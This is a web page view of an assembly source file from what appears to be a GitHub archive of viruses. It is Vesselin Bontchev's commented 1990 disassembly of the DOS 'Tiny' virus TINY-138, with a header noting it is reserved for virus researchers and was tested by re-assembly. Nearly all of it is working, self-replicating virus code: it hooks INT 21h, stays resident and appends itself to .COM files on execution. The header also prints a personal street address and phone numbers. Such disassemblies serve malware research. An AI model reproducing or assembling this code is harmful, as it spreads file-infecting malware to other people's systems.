/t/TINY-138.ASM

https://github.com/guitmz/virii · Assembly · 168 lines · 104 code · 40 blank · 24 comment · 0 complexity · 0ad7b5f8a4abcf81005dc373fdd4f956 MD5 · raw file

  1. page ,132
  2. name TINY138
  3. title The 'Tiny' virus, version TINY-138
  4. .radix 16
  5. ; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
  6. ; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
  7. ; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
  8. ; º º
  9. ; º The 'Tiny' Virus, version TINY-138 º
  10. ; º Disassembled by Vesselin Bontchev, September 1990 º
  11. ; º º
  12. ; º Copyright (c) Vesselin Bontchev 1989, 1990 º
  13. ; º º
  14. ; º This listing is only to be made available to virus researchers º
  15. ; º or software writers on a need-to-know basis. º
  16. ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
  17. ; The disassembly has been tested by re-assembly using MASM 5.0.
  18. code segment
  19. assume cs:code, ds:code
  20. org 100
  21. seg_60 equ 600
  22. v_len equ v_end-first4
  23. start:
  24. jmp v_entry ; Jump to virus code
  25. db 'M' ; Virus signature
  26. mov ax,4C00 ; Program terminate
  27. int 21
  28. ; The original first 4 bytes of the infected file:
  29. first4 db 0EBh, 2, 90, 90
  30. v_entry:
  31. mov si,0FF ; Initialize some registers
  32. mov di,offset start ; Put the addres of program start in DI
  33. mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
  34. ; The virus will be installed in memory at
  35. ; address 0050:0100h (i.e., at segment 60h):
  36. mov cx,50
  37. add si,[si+2] ; Determine the start addres of the virus body
  38. push di ; Now a Near RET instruction will run the prg.
  39. movsw ; Restore the original first 4 bytes
  40. movsw
  41. mov es,cx ; Point ES:DI at 0050:0100h
  42. cmpsb ; Check if the virus is present in memory
  43. jz run ; Just run the program if so
  44. ; Virus not in memory. Install it there:
  45. dec si ; Correct SI & DI to point at the start of
  46. dec di ; virus code and to destination address
  47. rep movsw ; Move the virus there
  48. mov es,cx ; ES := 0
  49. ; Move the INT 21h handler to INT 32h and
  50. ; install int_21 as new INT 21h handler.
  51. ; By the way, now DI == 1A4h (i.e., 69h*4):
  52. xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
  53. xchg ax,cx ; preserving AX
  54. lp:
  55. xchg ax,cx ; Get a word
  56. xchg ax,es:[di-(69-21)*4] ; Swap the two words
  57. stosw ; Save the word
  58. jcxz lp ; Loop until done (two times)
  59. xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
  60. run:
  61. push ds ; Restore ES
  62. pop es
  63. ret ; And exit (go to CS:100h)
  64. int_21: ; New INT 21h handler
  65. cmp ax,4B00 ; EXEC function call?
  66. jne end_21 ; Exit if not
  67. push ax ; Save registers used
  68. push bx
  69. push dx
  70. push ds
  71. push es
  72. mov ax,3D02 ; Open the file for both reading and writting
  73. call do_int21
  74. jc end_exec ; Exit on error
  75. cbw ; Zero AH
  76. cwd ; Zero DX
  77. mov bx,si ; Save handle in BX
  78. mov ds,ax ; Set DS and ES to 60h,
  79. mov es,ax ; the virus data segment
  80. mov ah,3F ; Read the first 4 bytes
  81. int 69
  82. ; Check whether the file is already infected or is an .EXE file.
  83. ; The former contains the character `M' in its 3rd byte and
  84. ; the latter contains it either in the 0th or in the 1st byte.
  85. mov al,'M' ; Look for `M'
  86. repne scasb
  87. jz close ; Exit if file not suitable for infection
  88. mov al,2 ; Seek to the end of file
  89. call lseek ; SI now contains the file size
  90. mov cl,v_len ; Length of virus body
  91. int 69 ; Append the virus to the file (AH is now 40h)
  92. mov al,0E9 ; Near JMP opcode
  93. stosb ; Form the first instruction of the file
  94. inc si ; Add 1 to file size for the JMP
  95. xchg ax,si ; Move it in AX
  96. stosw ; Form the JMP's opperand
  97. mov al,'M' ; Add a `M' character to mark the file
  98. stosb ; as infected
  99. xchg ax,dx ; Zero AX
  100. call lseek ; Seek to the beginning
  101. int 69 ; AH is 40h, write the JMP instruction
  102. close:
  103. mov ah,3E ; Close the file
  104. int 69
  105. end_exec:
  106. pop es ; Restore used registers
  107. pop ds
  108. pop dx
  109. pop bx
  110. pop ax
  111. ; Exit through the original INT 21h handler:
  112. end_21:
  113. jmp dword ptr cs:[69*4]
  114. lseek:
  115. mov ah,42 ; Seek operation
  116. cwd ; Zero DX
  117. do_int21:
  118. xor cx,cx ; External entry for Open
  119. int 69
  120. mov cl,4 ; 4 bytes will be read/written
  121. xchg ax,si ; Store AX in SI
  122. mov ax,4060 ; Prepare AH for Write
  123. xor di,di ; Zero DI
  124. ret ; Done
  125. v_end equ $ ; End of virus body
  126. code ends
  127. end start
  128.